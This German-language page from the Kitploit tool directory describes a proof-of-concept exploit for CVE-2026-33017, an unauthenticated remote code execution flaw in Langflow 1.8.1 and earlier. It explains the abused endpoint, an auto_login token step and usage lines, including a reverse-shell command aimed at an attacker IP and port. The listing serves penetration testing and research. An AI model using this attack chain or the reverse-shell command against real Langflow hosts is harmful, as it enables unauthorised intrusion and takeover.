Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — Die Schwachstelle in Langflow 1.8.1 und früheren Versionen ermöglicht es einem entfernten, nicht authentifizierten Angreifer, beliebige Befehle auf dem Host auszuführen. | Kitploit
Tools/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

Die Schwachstelle in Langflow 1.8.1 und früheren Versionen ermöglicht es einem entfernten, nicht authentifizierten Angreifer, beliebige Befehle auf dem Host auszuführen.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33017-Langflow-RCE-PoC

Die Schwachstelle in Langflow 1.8.1 und früheren Versionen ermöglicht es einem entfernten, nicht authentifizierten Angreifer, beliebige Befehle auf dem Host auszuführen.

Beschreibung

Der Endpunkt POST /api/v1/build_public_tmp/{flow_id}/flow erlaubt es jedem, öffentliche Flows ohne Authentifizierung zu erstellen.

Durch die Angabe des optionalen Datenparameters kann ein Angreifer den gespeicherten Flow mit einer eigenen, manipulierten Definition überschreiben und dabei beliebigen Python-Code in die Knotenkonfigurationen einbetten. Dieser vom Benutzer kontrollierte Code wird über exec() ohne Sandboxing oder Validierung ausgeführt, was zu nicht authentifizierter Remote-Codeausführung führt.

Betroffene Versionen

root@kitploit:~
Langflow 1.8.1 und früher

Funktionen

  • Erstellen eines öffentlichen Flows, wenn AUTO_LOGIN=true
  • Exploit-Ausführung: Ausführen beliebiger Befehle.
  • Reverse Shell: Starten einer bash-basierten Reverse Shell.

Voraussetzungen

  • Die Ziel-Langflow-Instanz verfügt über mindestens einen öffentlichen Flow (häufig in Demos, Chatbots oder gemeinsam genutzten Workflows)
  • Die UUID eines öffentlichen Flows (kann aus geteilten Links/URLs abgerufen werden)
  • Keine Authentifizierung erforderlich

Wenn AUTO_LOGIN=true (Standardkonfiguration), kann ein nicht authentifizierter Angreifer alle Bedingungen erfüllen:

  • GET /api/v1/auto_login → Erhalt eines Superuser-Tokens
  • POST /api/v1/flows/ → Erstellen eines öffentlichen Flows
  • Auslösen des Exploits über build_public_tmp ohne jegliche Authentifizierung

Verwendung

root@kitploit:~
python cve-2026-33017.py <host> [Optionen]

Optionen:

root@kitploit:~
-p PORT, --port PORT: SSH-Port (Standard: 7860)

-id FLOW_ID, --flow_id FLOW_ID: Öffentliche Flow-ID (eine neue wird erstellt, wenn weggelassen)

-c COMMAND, --command COMMAND: Benutzerdefinierter Befehl zur Ausführung

--shell: Starten einer Reverse Shell

--lhost LHOST: IP des Angreifers für die Reverse Shell

--lport LPORT: Port des Angreifers für die Reverse Shell (Standard: 4444)

-t TIMEOUT, --timeout TIMEOUT: Verbindungs-Timeout in Sekunden (Standard: 5)

Beispiele:

Einen Befehl ausführen:

root@kitploit:~
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'

Eine Reverse Shell starten:

root@kitploit:~
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Referenzen

GitHub Advisory

NVD CVE-2026-33017

Medium

⚠️ Haftungsausschluss

Dieser PoC dient nur zu Bildungs- und Forschungszwecken. Verwenden Sie ihn auf eigenes Risiko. Der Autor ist nicht für Missbrauch oder verursachte Schäden verantwortlich.

Tool herunterladen